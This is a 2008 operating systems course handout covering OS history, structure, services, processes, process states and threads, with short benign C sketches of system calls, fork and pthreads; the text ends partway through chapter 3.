Microlink Information Technology College
Mekelle Branch
Department of Computer Science
Operating Systems
Prepared By: Tewdros Sisay (M.Sc. in Computer Science)
May 2008
Acronyms
ACL   Access Control List
CPU   Central Processing Unit
FCFS  First-Come-First-Served
FIFO  First-In-First-Out
I/O   Input/Output
LRU   Least Recently Used
LSI   Large Scale Integration
LWP   Lightweight Process
MRU   Most Recently Used
OS    Operating System
PC    Program Counter
PCB   Process Control Block
PFF   Page-Fault Frequency
RAM   Random Access Memory
SJF   Shortest-Job-First
SPN   Shortest-Process-Next
SRT   Shortest-Remaining-Time
TLB   Translation Lookaside Buffer
List of Tables
Table 4.1 Initial state of Banker’s algorithm
Table 4.2 Safe state of Banker’s algorithm
Table 4.3 Deadlock in Banker’s algorithm
Table 4.4 Unsafe state may not lead to deadlock
Table 4.5 Process scheduling exercise
Table 6.1 Wasteful allocation of disk space
List of Figures
Figure 3.1 Creation of thread vs process
Figure 3.2 Implementation of threads in Solaris 2
Figure 4.1 Critical section
Figure 5.1 Memory allocation
Figure 5.2 Paging in memory management
Figure 5.3 Allocation of pages in page frames
Figure 5.4 Page table management (a)
Figure 5.5 Page table management (b)
Figure 5.6 Page frame allocation vs page fault rate
Figure 5.7 Number of processes vs CPU utilization (a)
Figure 5.8 Number of processes vs CPU utilization (b)
Figure 5.9 CLOCK algorithm flowchart
Figure 5.10 Implementation of memory allocation in Multics
Figure 6.1 Structure of I/O system
Figure 6.2 Device I/O addressing
Figure 6.3 I/O and CPU processing
Figure 6.4 Configuration of Hard-disk
Preface
This teaching material is prepared to support the Operating System course offered in Computer
Science programs. It has been organized from textbooks, reference books, handouts prepared for the
course, Internet sources and other relevant materials.
It covers the basic design principles like the process concept, process management, inter-process
communication & synchronization, memory management, I/O management, file management, and
security. It also includes practical implementation examples and exercises at the relevant parts of the text.
Table of Contents
1. Introduction
1.1 Terminology
1.2 Computer Systems Operation
1.3 Evolution of Operating Systems
1.4 Operating System Structure
2. Overview of Operating Systems
2.1 Components of Operating Systems
2.2 Operating Systems Services
2.3 Characteristics of Operating Systems
3. Process Description
3.1 The Process Concept
3.2 Process States
3.3 Threads
3.4 Implementation
3.5 Exercises
4. Process Management
4.1 CPU/Process Scheduling
4.2 Interprocess Communication
4.3 Process Synchronization
4.4 Deadlock
4.5 Implementation
4.6 Exercises
5. Memory Management
5.1 Memory Allocation
5.2 Swapping
5.3 Paging
5.4 Virtual Memory
5.5 Segmentation
5.6 Implementation
5.7 Exercise
6. Device Management
6.1 I/O Devices
6.2 Device Addressing
6.3 Device Accesses
6.4 Overlapped I/O and CPU Processing
6.5 Disk as an Example Device
6.6 Disk Controller and Disk Device Driver
6.7 Exercises
7. File Management
7.1 General Concepts
7.2 File System Structure
7.3 Access Methods and Protection
7.4 Implementing File Systems
7.5 Implementation
7.6 Exercises
8. Protection and Security
8.1 User Security
8.2 Access Control Lists
8.3 Cryptography
8.4 Exercises
Bibliography
1. Introduction
1.1 Terminology
The 1960s definition of an operating system is "the software that controls the hardware". Today, however, due to microcode we need a better definition. We see an operating system as the programs that make the hardware usable. In brief, an operating system is the set of programs that controls a computer. Some examples of operating systems are UNIX, Mach, MS-DOS, MS-Windows, Windows NT, Chicago, OS/2, MacOS, VMS, MVS, and VM.
Controlling the computer involves software at several levels. We will differentiate kernel
services, library services, and application-level services, all of which are part of the operating
system. Processes run Applications, which are linked together with libraries that perform
standard services. The kernel supports the processes by providing a path to the peripheral
devices. The kernel responds to service calls from the processes and interrupts from the devices.
The core of the operating system is the kernel, a control program that functions in privileged
state, an execution context that allows all hardware instructions to be executed, reacting to
interrupts from external devices and to service requests and traps from processes. Generally, the
kernel is a permanent resident of the computer. It creates and terminates processes and responds to their requests for service.
1.2 Computer Systems Operation
Operating Systems are resource managers. The main resource is computer hardware in the form
of processors, storage, input/output devices, communication devices, and data. Some of the
operating system functions are: implementing the user interface, sharing hardware among users,
allowing users to share data among themselves, preventing users from interfering with one
another, scheduling resources among users, facilitating input/output, recovering from errors,
accounting for resource usage, facilitating parallel operations, organizing data for secure and
rapid access, and handling network communications.
1.3 Evolution of Operating Systems
Historically, operating systems have been tightly related to computer architecture, so it is a good idea to study the history of operating systems from the architecture of the computers on which they run.
Operating systems have evolved through a number of distinct phases or generations, which correspond roughly to decades.
The 1940's - First Generations
The earliest electronic digital computers had no operating systems. Machines of the time were so primitive that programs were often entered one bit at a time on rows of mechanical switches (plug boards). Programming languages were unknown (not even assembly languages). Operating systems were unheard of.
The 1950's - Second Generation
By the early 1950s, the routine had improved somewhat with the introduction of punched cards. The General Motors Research Laboratories implemented the first operating system in the early 1950s for their IBM 701. The systems of the 1950s generally ran one job at a time. These were called single-stream batch processing systems because programs and data were submitted in groups or batches.
The 1960's - Third Generation
The systems of the 1960's were also batch processing systems, but they were able to take better
advantage of the computer's resources by running several jobs at once. So operating systems
designers developed the concept of multiprogramming in which several jobs are in main memory
at once; a processor is switched from job to job as needed to keep several jobs advancing while
keeping the peripheral devices in use.
For example, on a system with no multiprogramming, when the current job paused to wait for an I/O operation to complete, the CPU simply sat idle until the I/O finished. The solution for
this problem that evolved was to partition memory into several pieces, with a different job in
each partition. While one job was waiting for I/O to complete, another job could be using the
CPU.
Another major feature of third-generation operating systems was the technique called spooling (simultaneous peripheral operations on line). In spooling, a high-speed device like a disk is interposed between a running program and a low-speed device involved with the program in input/output. Instead of writing directly to a printer, for example, outputs are written to the disk. Programs can run to completion faster, and other programs can be initiated sooner; when the printer becomes available, the outputs can be printed.
Note that spooling is much like thread being spun onto a spool so that it may later be unwound as needed.
Another feature present in this generation was the time-sharing technique, a variant of multiprogramming, in which each user has an on-line (i.e., directly connected) terminal. Because the user is present and interacting with the computer, the computer system must respond quickly to user requests; otherwise user productivity could suffer. Time-sharing systems were developed to multiprogram large numbers of simultaneous interactive users.
Fourth Generation
With the development of LSI (Large Scale Integration) circuits and chips, operating systems entered the personal computer and workstation age. Microprocessor technology evolved to the point that it became possible to build desktop computers as powerful as the mainframes of the 1970s. Two operating systems have dominated the personal computer scene: MS-DOS, written by Microsoft, Inc. for the IBM PC and other machines using the Intel 8088 CPU and its successors, and UNIX, which is dominant on the larger personal computers and workstations using the Motorola 68000 CPU family.
1.4 Operating System Structure
System Calls and System Programs
System calls provide an interface between a process and the operating system. System calls allow user-level processes to request services from the operating system that the process itself is not allowed to perform. In handling the trap, the operating system enters kernel mode, where it has access to privileged instructions, and can perform the desired service on behalf of the user-level process. It is because of the critical nature of these operations that the operating system itself performs them every time they are needed. For example, to perform I/O a process issues a system call telling the operating system to read or write a particular area, and this request is satisfied by the operating system.
System programs provide basic functionality to users so that they do not need to write their own environment for program development (editors, compilers) and program execution (shells). In some sense, they are bundles of useful system calls.
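As an illustration, here is a minimal sketch (not taken from the text above) of a user program performing I/O by trapping into the kernel through standard POSIX system calls; the file name is made up for the example.

/* Sketch: a user program requesting I/O services from the kernel
 * through the POSIX open/read/write/close system calls. */
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    char buf[256];
    int fd = open("input.txt", O_RDONLY);     /* trap into the kernel          */
    if (fd < 0)
        return 1;
    ssize_t n = read(fd, buf, sizeof buf);    /* kernel performs the device I/O */
    if (n > 0)
        write(STDOUT_FILENO, buf, (size_t)n); /* another service request        */
    close(fd);
    return 0;
}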
Layered Approach Design
In this case the system is easier to debug and modify, because changes affect only limited portions of the code, and a programmer does not have to know the details of the other layers.
Information is also kept only where it is needed and is accessible only in certain ways, so bugs
affecting that data are limited to a specific module or layer.
Mechanisms and Policies
The policy specifies what is to be done, while the mechanism specifies how it is to be done. For instance, the timer construct for ensuring CPU protection is a mechanism; on the other hand, the decision of how long the timer is set for a particular user is a policy decision.
The separation of mechanism and policy is important to provide flexibility to a system. If the
interface between mechanism and policy is well defined, the change of policy may affect only a
few parameters. On the other hand, if interface between these two is vague or not well defined, it
might involve much deeper change to the system.
Once the policy has been decided it gives the programmer the choice of using his/her own
implementation. Also, the underlying implementation may be changed for a more efficient one
without much trouble if the mechanism and policy are well defined. Specifically, separating
these two provides flexibility in a variety of ways. First, the same mechanism can be used to
implement a variety of policies, so changing the policy might not require the development of a
new mechanism, but just a change in parameters for that mechanism from a library of
mechanisms. Second, the mechanism can be changed, for example to increase its efficiency or to move to a new platform, without changing the overall policy.
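To make the separation concrete, here is an illustrative sketch (the type and function names are invented for this example, not part of any real kernel): the timer mechanism only knows how to arm a preemption interrupt, while the policy layer chooses the quantum.

/* Mechanism/policy separation, sketched with made-up names. */
typedef struct { int ticks; } timer_sketch;

/* Mechanism: HOW preemption is done -- arm the timer for q ticks. */
static void arm_timer(timer_sketch *t, int quantum_ticks)
{
    t->ticks = quantum_ticks;          /* a real kernel would program hardware here */
}

/* Policy: WHAT should be done -- pick the quantum for a class of user. */
static int quantum_for(int interactive)
{
    return interactive ? 10 : 100;     /* changing policy = changing a parameter */
}

void schedule_next(timer_sketch *t, int interactive)
{
    arm_timer(t, quantum_for(interactive));  /* same mechanism serves any policy */
}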
2. Overview of Operating Systems
2.1 Components of Operating Systems
Even though not all systems have the same structure, many modern operating systems share the goal of supporting the following types of system components.
Process Management. The operating system manages many kinds of activities ranging from user programs to system programs like the printer spooler, name servers, file servers, etc. Each of these activities is encapsulated in a process. A process includes the complete execution context, that is, the code, data, program counter, registers, OS resources in use, etc.
It is important to note that a process is not a program. A process is only ONE instance of a program in execution, and many processes can be running the same program. The five major activities of an operating system in regard to process management are:
- Creation and deletion of user and system processes.
- Suspension and resumption of processes.
- A mechanism for process synchronization.
- A mechanism for process communication.
- A mechanism for deadlock handling.
Main-Memory Management. Primary memory or main memory is a large array of words or bytes. Each word or byte has its own address. Main memory provides storage that can be accessed directly by the CPU; that is to say, for a program to be executed, it must be in main memory. The major activities of an operating system in regard to memory management are:
- Keeping track of which parts of memory are currently being used and by whom.
- Deciding which processes are loaded into memory when memory space becomes available.
- Allocating and deallocating memory space as needed.
File Management. A file is a collection of related information defined by its creator. Computers can store files on disk (secondary storage), which provides long-term storage. Some examples of storage media are magnetic tape, magnetic disk and optical disk. Each of these media has its own properties such as speed, capacity, data transfer rate and access method.
A file system is normally organized into directories to ease its use. These directories may contain files and other directories.
The five major activities of an operating system in regard to file management are (a minimal sketch of such primitives follows the list):
1. The creation and deletion of files.
2. The creation and deletion of directories.
3. The support of primitives for manipulating files and directories.
4. The mapping of files onto secondary storage.
5. The backup of files on stable storage media.
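The following sketch shows those primitives as seen by a user program, using standard POSIX calls; the file and directory names are made up for the example.

/* Sketch: creating, manipulating and deleting a file and a directory. */
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

int main(void)
{
    int fd = open("notes.txt", O_CREAT | O_WRONLY, 0644); /* create a file     */
    if (fd >= 0) {
        write(fd, "hello\n", 6);                          /* manipulate it     */
        close(fd);
    }
    mkdir("archive", 0755);                               /* create a directory */
    unlink("notes.txt");                                  /* delete the file    */
    rmdir("archive");                                     /* delete the directory */
    return 0;
}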
I/O System Management. The I/O subsystem hides the peculiarities of specific hardware devices from the user. Only the device driver knows the peculiarities of the specific device to which it is assigned.
Secondary-Storage Management. Generally speaking, systems have several levels of storage,
including primary storage, secondary storage and cache storage. Instructions and data must be
placed in primary storage or cache to be referenced by a running program. Because main
memory is too small to accommodate all data and programs, and its data are lost when power is
lost, the computer system must provide secondary storage to back up main memory. Secondary storage consists of tapes, disks, and other media designed to hold information that will eventually be accessed in primary storage. Storage (primary, secondary, cache) is ordinarily divided into bytes or words consisting of a fixed number of bytes. Each location in storage has an address; the set of all addresses available to a program is called an address space.
The three major activities of an operating system in regard to secondary storage management are:
1. Managing the free space available on the secondary-storage device.
2. Allocation of storage space when new files have to be written.
3. Scheduling the requests for memory access.
Networking. A distributed system is a collection of processors that do not share memory,
peripheral devices, or a clock. The processors communicate with one another through communication lines, called a network. The communication-network design must consider routing and connection strategies, and the problems of contention and security.
Protection System. If a computer system has multiple users and allows the concurrent execution
of multiple processes, then the various processes must be protected from one another's activities.
Protection refers to mechanism for controlling the access of programs, processes, or users to the
resources defined by a computer system.
Command Interpreter System. A command interpreter is an interface between the operating system and the user. The user gives commands, which are executed by the operating system (usually by turning them into system calls). The main function of a command interpreter is to get and execute the next user-specified command. The command interpreter is usually not part of the kernel, since multiple command interpreters (shells, in UNIX terminology) may be supported by an operating system, and they do not really need to run in kernel mode. There are two main advantages to separating the command interpreter from the kernel (a toy interpreter is sketched after this list):
1. If we want to change the way the command interpreter looks, i.e., change its interface, we can do so only if the command interpreter is separate from the kernel; if it were part of the kernel, changing its interface would mean changing kernel code.
2. If the command interpreter were part of the kernel, it would be possible for a malicious process to gain access to parts of the kernel that it should not have. To avoid this scenario, it is advantageous to keep the command interpreter separate from the kernel.
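A toy command interpreter, sketched with standard POSIX calls (an illustrative user-level program, not the shell of any particular system): it reads a command name, forks a child, execs the program and waits for it. For simplicity it handles a single command name with no arguments.

/* Sketch of a user-level command interpreter built from system calls. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

int main(void)
{
    char line[256];
    for (;;) {
        printf("> ");
        fflush(stdout);
        if (fgets(line, sizeof line, stdin) == NULL)   /* end of input: quit  */
            break;
        line[strcspn(line, "\n")] = '\0';
        if (line[0] == '\0')
            continue;
        pid_t pid = fork();                 /* system call: create a process   */
        if (pid == 0) {
            execlp(line, line, (char *)NULL); /* system call: run the program  */
            perror("exec");                 /* reached only if exec fails      */
            _exit(1);
        }
        waitpid(pid, NULL, 0);              /* system call: wait for the child */
    }
    return 0;
}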
2.2 Operating Systems Services
Following are five services provided by operating systems for the convenience of users.
Program Execution. The purpose of a computer system is to allow the user to execute programs.
So the operating system provides an environment where the user can conveniently run programs.
The user does not have to worry about the memory allocation or multitasking or anything. These
things are taken care of by the operating systems.
Running a program involves allocating and deallocating memory, and CPU scheduling in the case of multiprocessing. These functions cannot be given to user-level programs, so user-level programs cannot help the user to run programs independently without help from the operating system.
I/O Operations. Each program requires input and produces output. This involves the use of I/O. The operating system hides from the user the details of the underlying hardware needed for the I/O. All the user sees is that the I/O has been performed, without the details. So, by providing I/O, the operating system makes it convenient for users to run programs.
For efficiency and protection, users cannot control I/O directly, so this service cannot be provided by user-level programs.
File System Manipulation. The output of a program may need to be written into new files or
input taken from some files. The operating systems provide this service. The user does not have
to worry about secondary storage management. The user gives a command for reading from or writing to a file and sees his or her task accomplished. Thus operating systems make it easier for user programs to accomplish their task.
This service involves secondary storage management. The speed of I/O that depends on secondary storage management is critical to the speed of many programs, and hence it is better to let the operating system manage it than to give individual users control of it. It is not difficult for user-level programs to provide these services, but for the above-mentioned reasons it is best if this service is left to the operating system.
Communications. There are instances where processes need to communicate with each other to
exchange information. It may be between processes running on the same computer or running on
the different computers. By providing this service the operating system relieves the user of the
worry of passing messages between processes. In cases where messages need to be passed to processes on other computers through a network, this can be done by user programs. The user program may be customized to the specifics of the hardware through which the message transits and provide the service interface to the operating system.
Error Detection. An error in one part of the system may cause malfunctioning of the complete system. To avoid such a situation the operating system constantly monitors the system to detect errors. This relieves the user of the worry of errors propagating to various parts of the system and causing malfunctions.
This service cannot be left to user programs, because it involves monitoring, and in some cases altering, areas of memory, deallocating memory of a faulty process, or perhaps relinquishing the CPU from a process that goes into an infinite loop. These tasks are too critical to be handed over to user programs. A user program, if given these privileges, could interfere with the correct (normal) operation of the operating system.
2.3 Characteristics of Operating Systems
Modern operating systems generally have the following three major goals. Operating systems generally accomplish these goals by running processes in low privilege and providing service calls that invoke the operating system kernel in a high-privilege state.
To hide the details of the hardware by creating abstractions. An abstraction is software that hides lower-level details and provides a set of higher-level functions. An operating system transforms the physical world of devices, instructions, memory, and time into a virtual world that is the result of abstractions built by the operating system. There are several reasons for abstraction. First, the code needed to control peripheral devices is not standardized. Operating systems provide subroutines called device drivers that perform operations on behalf of programs, for example input/output operations. Second, the operating system introduces new functions as it abstracts the hardware. For instance, the operating system introduces the file abstraction so that programs do not
have to deal with disks. Third, the operating system transforms the computer hardware into
multiple virtual computers, each belonging to a different program. Each program that is running
is called a process. Each process views the hardware through the lens of abstraction.
Fourth, the operating system can enforce security through abstraction.
To allocate resources to processes. An operating system controls how processes (the active agents) may access resources (the passive entities).
To provide a pleasant and effective user interface. The user interacts with the operating system through the user interface and is usually interested in the "look and feel" of the operating system.
The most important components of the user interface are the command interpreter, the file
system, on-line help, and application integration. The recent trend has been toward increasingly
integrated graphical user interfaces that encompass the activities of multiple processes on
networks of computers.
One can view operating systems from two points of view: resource manager and extended machine. From the resource-manager point of view, operating systems manage the different parts of the system efficiently; from the extended-machine point of view, operating systems provide a virtual machine to users that is more convenient to use. Structurally, operating systems can be designed as a monolithic system, a hierarchy of layers, a virtual machine system, an exokernel, or using the client-server model. The basic concepts of operating systems are processes, memory management, I/O management, the file system, and security.
3. Process Description
The notion of process is central to the understanding of operating systems. There are quite a few
definitions presented in the literature, but no "perfect" definition has yet appeared.
3.1 The Process Concept
The term "process" was first used by the designers of MULTICS in the 1960s. Since then, the term process has been used somewhat interchangeably with 'task' or 'job'. The process has been given many definitions, for instance:
- A program in execution.
- An asynchronous activity.
- The 'animated spirit' of a procedure in execution.
- The entity to which processors are assigned.
- The 'dispatchable' unit.
Many more definitions have been given. As we can see from the above, there is no universally agreed-upon definition, but "a program in execution" seems to be the one most frequently used, and it is the concept we will use in the present study of operating systems.
Now that we have agreed upon a definition of process, the question is: what is the relation between a process and a program? Is it the same beast with a different name, so that when the beast is sleeping (not executing) it is called a program and when it is executing it becomes a process? To be precise, a process is not the same as a program. In the following discussion we point out some of the differences between the two.
A process is more than the program code. A process is an 'active' entity, as opposed to a program, which is considered a 'passive' entity. A program is an algorithm expressed in some suitable notation (e.g., a programming language). Being passive, a program is only a part of a process. A process, on the other hand, includes:
- The current value of the program counter (PC).
- The contents of the processor's registers.
- The values of the variables.
- The process stack (SP), which typically contains temporary data such as subroutine parameters, return addresses, and temporary variables.
- A data section that contains global variables.
A process is the unit of work in a system.
In the process model, all software on the computer is organized into a number of sequential processes. A process includes the PC, registers, and variables. Conceptually, each process has its own virtual CPU. In reality, the CPU switches back and forth among processes (this rapid switching back and forth is called multiprogramming).
3.2 Process States
The process state consists of everything necessary to resume the process's execution if it is somehow put aside temporarily. The process state consists of at least the following:
- Code for the program.
- The program's static data.
- The program's dynamic data.
- The program's procedure call stack.
- Contents of the general-purpose registers.
- Contents of the program counter (PC).
- Contents of the program status word (PSW).
- Operating system resources in use.
A process goes through a series of discrete process states:
- New state: the process is being created.
- Running state: a process is said to be running if it has the CPU, that is, it is actually using the CPU at that particular instant.
- Blocked (or waiting) state: a process is said to be blocked if it is waiting for some event to happen, such as an I/O completion, before it can proceed. Note that a blocked process is unable to run until some external event happens.
- Ready state: a process is said to be ready if it could use a CPU if one were available. A ready process is runnable but temporarily stopped to let another process run.
- Terminated state: the process has finished execution.
The basic Process Operations are process creation and process termination. The details of these
operations are described below.
Process Creation. In general-purpose systems, some way is needed to create processes as needed during operation. There are four principal events that lead to process creation:
- System initialization.
- Execution of a process-creation system call by a running process.
- A user request to create a new process.
- Initiation of a batch job.
Foreground processes interact with users. Background processes stay in the background, sleeping, but spring to life to handle activity such as email, web pages, printing, and so on. Background processes are called daemons.
A process may create a new process by means of a process-creation call such as fork, which creates an exact clone of the calling process. When it does so, the creating process is called the parent process and the created one is called the child process. Only one parent is needed to create a child process; note that, unlike plants and animals that use sexual reproduction, a process has only one parent. This creation of processes yields a hierarchical structure (a process tree): each child has only one parent, but each parent may have many children. After the fork, the two processes, the parent and the child, have the same memory image, the same environment strings and the same open files. After a process is created, both the parent and child have their own distinct address space: if either process changes a word in its address space, the change is not visible to the other process (a minimal fork sketch appears after the list of reasons below).
Following are some reasons for the creation of a process:
- A user logs on.
- A user starts a program.
- The operating system creates a process to provide a service, e.g., to manage a printer.
- Some program starts another process, e.g., Netscape calls xv to display a picture.
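A minimal fork sketch (fork is the standard UNIX call; the variable and the printed output are made up for illustration), showing that parent and child receive distinct copies of the address space:

/* Sketch: the child's change to 'x' is not visible to the parent. */
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>

int main(void)
{
    int x = 0;
    pid_t pid = fork();              /* clone the calling process        */
    if (pid == 0) {                  /* child */
        x = 42;                      /* modifies only the child's copy   */
        printf("child:  x = %d\n", x);
        return 0;
    }
    waitpid(pid, NULL, 0);           /* parent waits for its child       */
    printf("parent: x = %d\n", x);   /* still 0 in the parent            */
    return 0;
}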
Process Termination. A process terminates when it finishes executing its last statement. Its resources are returned to the system, it is purged from any system lists or tables, and its process control block (PCB) is erased, i.e., the PCB's memory space is returned to a free memory pool. A process may also be terminated by another process or by the operating system, usually for one of the following reasons:
- Normal exit. Most processes terminate because they have done their work. This call is exit in UNIX.
- Error exit. The process discovers a fatal error; for example, a user tries to compile a program file that does not exist.
- Fatal error. An error is caused by the process due to a bug in the program, for example executing an illegal instruction, referencing non-existent memory, or dividing by zero.
- Killed by another process. A process executes a system call telling the operating system to terminate some other process. In UNIX, this call is kill. In some systems, when a process is killed, all the processes it created are killed as well (UNIX does not work this way).
Process States. A process goes through a series of discrete process states.
- New state. The process is being created.
- Terminated state. The process has finished execution.
- Blocked (waiting) state. When a process blocks, it does so because logically it cannot continue, typically because it is waiting for input that is not yet available. Formally, a process is said to be blocked if it is waiting for some event to happen (such as an I/O completion) before it can proceed. In this state a process is unable to run until some external event happens.
- Running state. A process is said to be running if it currently has the CPU, that is, it is actually using the CPU at that particular instant.
- Ready state. A process is said to be ready if it could use a CPU if one were available. It is runnable but temporarily stopped to let another process run.
Logically, the 'Running' and 'Ready' states are similar. In both cases the process is willing to run, only in the case of the 'Ready' state there is temporarily no CPU available for it. The 'Blocked' state is different from the 'Running' and 'Ready' states in that the process cannot run, even if a CPU is available.
Process State Transitions. The following are the six possible transitions among the above-mentioned five states (a small sketch encoding them follows the list).
- Transition 1 occurs when a process discovers that it cannot continue. If the running process initiates an I/O operation before its allotted time expires, it voluntarily relinquishes the CPU. This state transition is: Block (process-name): Running → Blocked.
- Transition 2 occurs when the scheduler decides that the running process has run long enough and it is time to let another process have CPU time. This state transition is: Time-Run-Out (process-name): Running → Ready.
- Transition 3 occurs when all other processes have had their share and it is time for the first process to run again. This state transition is: Dispatch (process-name): Ready → Running.
- Transition 4 occurs when the external event for which a process was waiting (such as arrival of input) happens. This state transition is: Wakeup (process-name): Blocked → Ready.
- Transition 5 occurs when the process is created. This state transition is: Admitted (process-name): New → Ready.
- Transition 6 occurs when the process has finished execution. This state transition is: Exit (process-name): Running → Terminated.
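A small illustrative sketch (the type and function names are invented for this example) encoding the five states and the six legal transitions listed above:

/* Sketch: the six legal state transitions as a simple check function. */
typedef enum { NEW, READY, RUNNING, BLOCKED, TERMINATED } pstate;

/* Returns 1 if moving from 'from' to 'to' is one of the six transitions. */
int legal_transition(pstate from, pstate to)
{
    return (from == NEW     && to == READY)      ||  /* admitted     */
           (from == READY   && to == RUNNING)    ||  /* dispatch     */
           (from == RUNNING && to == READY)      ||  /* time-run-out */
           (from == RUNNING && to == BLOCKED)    ||  /* block (I/O)  */
           (from == BLOCKED && to == READY)      ||  /* wakeup       */
           (from == RUNNING && to == TERMINATED);    /* exit         */
}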
Process Control Block. A process in an operating system is represented by a data structure known as a process control block (PCB) or process descriptor. The PCB contains important information about the specific process, including:
- The current state of the process, i.e., whether it is ready, running, waiting, or whatever.
- A unique identification of the process, in order to track "which is which".
- A pointer to the parent process.
- Similarly, a pointer to the child process (if it exists).
- The priority of the process (a part of the CPU scheduling information).
- Pointers to locate the memory of the process.
- A register save area.
- The processor it is running on.
The PCB is a central store of information that allows the operating system to locate key information about a process. Thus, the PCB is the data structure that defines a process to the operating system.
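A hypothetical, much-simplified PCB layout mirroring the fields listed above (real kernels keep considerably more state; Linux's task_struct, for instance, is far larger):

/* Sketch of a simplified process control block. */
typedef struct pcb {
    int           pid;            /* unique identification                */
    int           state;          /* ready, running, waiting, ...         */
    struct pcb   *parent;         /* pointer to the parent process        */
    struct pcb   *first_child;    /* pointer to a child process           */
    int           priority;       /* CPU-scheduling information           */
    void         *page_table;     /* pointers to the process's memory     */
    unsigned long registers[32];  /* register save area (incl. PC, SP)    */
    int           cpu;            /* processor it last ran on             */
} pcb;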
3.3 Threads
Despite the fact that a thread must execute within a process, the process and its associated threads are different concepts. Processes are used to group resources together; threads are the entities scheduled for execution on the CPU.
A thread is a single sequential stream of execution within a process. Because threads have some of the properties of processes, they are sometimes called lightweight processes. Within a process, threads allow multiple streams of execution. In many respects, threads are a popular way to improve applications through parallelism. The CPU switches rapidly back and forth among the threads, giving the illusion that the threads are running in parallel. Like a traditional process (i.e., a process with one thread), a thread can be in any of several states (Running, Blocked, Ready or Terminated).
Each thread has its own stack. Since a thread will generally call different procedures and thus have a different execution history, each thread needs its own stack. In an operating system that has a thread facility, the basic unit of CPU utilization is a thread. A thread has, or consists of, a program counter (PC), a register set, and a stack space. Threads are not independent of one another the way processes are; as a result, a thread shares with the other threads of its process (also known as a task) the code section, data section, and OS resources such as open files and signals.
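A minimal sketch with POSIX threads (pthread_create/pthread_join; the worker function and the counter are made up for the example): two threads in one process share the global data section, while each has its own stack and program counter.

/* Sketch: two threads sharing the process's data section.
 * Compile with: cc -pthread ... */
#include <pthread.h>
#include <stdio.h>

static int shared_counter = 0;                      /* data section: shared by all threads */
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static void *worker(void *arg)
{
    int local = *(int *)arg;                        /* lives on this thread's own stack */
    pthread_mutex_lock(&lock);
    shared_counter += local;                        /* shared global, so access is synchronized */
    pthread_mutex_unlock(&lock);
    return NULL;
}

int main(void)
{
    pthread_t t1, t2;
    int a = 1, b = 2;
    pthread_create(&t1, NULL, worker, &a);
    pthread_create(&t2, NULL, worker, &b);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    printf("shared_counter = %d\n", shared_counter); /* both updates are visible: prints 3 */
    return 0;
}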
Processes vs. Threads. As mentioned earlier, in many respects threads operate in the same way as processes. Some of the similarities and differences are:
Similarities
- Like processes, threads share the CPU and only one thread is active (running) at a time.
- Like processes, threads within a process execute sequentially.
- Like processes, a thread can create children.
- Like processes, if one thread is blocked, another thread can run.
Differences
- Unlike processes, threads are not independent of one another.
- Unlike processes, all threads can access every address in the task.
- Unlike processes, threads are designed to assist one another. Note that processes may or may not assist one another, because processes may originate from different users.
Following are some reasons why threads are used in designing operating systems.
1. A process with multiple threads makes a great server, for example a print server.
2. Because threads can share common data, they do not need to use interprocess communication.
3. By their very nature, threads can take advantage of multiprocessors.
Threads are cheap in the sense that:
1. They only need a stack and storage for registers; therefore, threads are cheap to create.
2. Threads use very few resources of the operating system in which they are working. That is, threads do not need a new address space, global data, program code or operating system resources.
3. Context switching is fast when working with threads, because only the PC, SP and registers have to be saved and/or restored.
But this cheapness does not come for free: the biggest drawback is that there is no protection between threads.
User-Level Threads. User-level threads are implemented in user-level libraries, rather than via system calls, so thread switching does not need to call the operating system or cause an interrupt to the kernel. In fact, the kernel knows nothing about user-level threads and manages them as if they were single-threaded processes.
Advantages. The most obvious advantage of this technique is that a user-level threads package can be implemented on an operating system that does not support threads. Some other advantages are:
- User-level threads do not require modification of the operating system.
- Simple representation: each thread is represented simply by a PC, registers, a stack and a small control block, all stored in the user process's address space.
- Simple management: creating a thread, switching between threads and synchronizing between threads can all be done without intervention of the kernel.
- Fast and efficient: thread switching is not much more expensive than a procedure call.
Disadvantages. There is a lack of coordination between the threads and the operating system kernel. Therefore, the process as a whole gets one time slice irrespective of whether it has one thread or 1000 threads within it. It is up to each thread to relinquish control to the other threads.
User-level threads also require non-blocking system calls, i.e., a multithreaded kernel. Otherwise, the entire process will be blocked in the kernel, even if there are runnable threads left in the process. For example, if one thread causes a page fault, the whole process blocks.
Kernel-Level Threads. In this method, the kernel knows about and manages the threads. No runtime system is needed in this case. Instead of a thread table in each process, the kernel has a thread table that keeps track of all the threads in the system. In addition, the kernel also maintains the traditional process table to keep track of processes. The operating system kernel provides system calls to create and manage threads.
Advantages. Because the kernel has full knowledge of all threads, the scheduler may decide to give more time to a process having a large number of threads than to a process having a small number of threads. Kernel-level threads are especially good for applications that frequently block.
Disadvantages. Kernel-level threads are slow and inefficient. For instance, thread operations are hundreds of times slower than those of user-level threads. Since the kernel must manage and schedule threads as well as processes, it requires a full thread control block (TCB) for each thread to maintain information about it. As a result, there is significant overhead and increased kernel complexity.
Advantages of Threads over Multiple Processes.
- Context switching. Threads are very inexpensive to create and destroy, and they are inexpensive to represent. For example, they require space to store the PC, the SP, and the general-purpose registers, but they do not require space for memory-management information, information about open files or I/O devices in use, etc. With so little context, it is much faster to switch between threads; in other words, a context switch using threads is relatively easy.
- Sharing. Threads allow the sharing of many resources that cannot be shared between processes, for example the code section, the data section, and operating system resources such as open files.
Disadvantages of Threads over Multiple Processes.
- Blocking. The major disadvantage is that if the kernel is single-threaded, a system call by one thread will block the whole process, and the CPU may be idle during the blocking period.
- Security. Since there is extensive sharing among threads, there is a potential security problem. It is quite possible that one thread overwrites the stack of another thread (or damages shared data), although it is very unlikely since threads are meant to cooperate on a single task.
Applications that Benefit from Threads
A proxy server satisfying the requests of a number of computers on a LAN would benefit from a multi-threaded process. In general, any program that has to do more than one task at a time can benefit from multithreading. For example, a program that reads input, processes it, and writes output could have three threads, one for each task.
Applications that Cannot Benefit from Threads
Any sequential process that cannot be divided into parallel tasks will not benefit from threads, as the tasks would block until the previous one completes. For example, a program that displays the time of day would not benefit from multiple threads.
Resources used in Thread Creation and Process Creation
When a new thread is created it shares its code section, data section and operating system
resources like open files with other threads. But it is allocated its own stack, register set and a
program counter.
The creation of a new process differs from that of a thread mainly in the fact that all the resources a thread shares must be allocated explicitly for each new process.
Figure 3.1 Creation of thread vs process
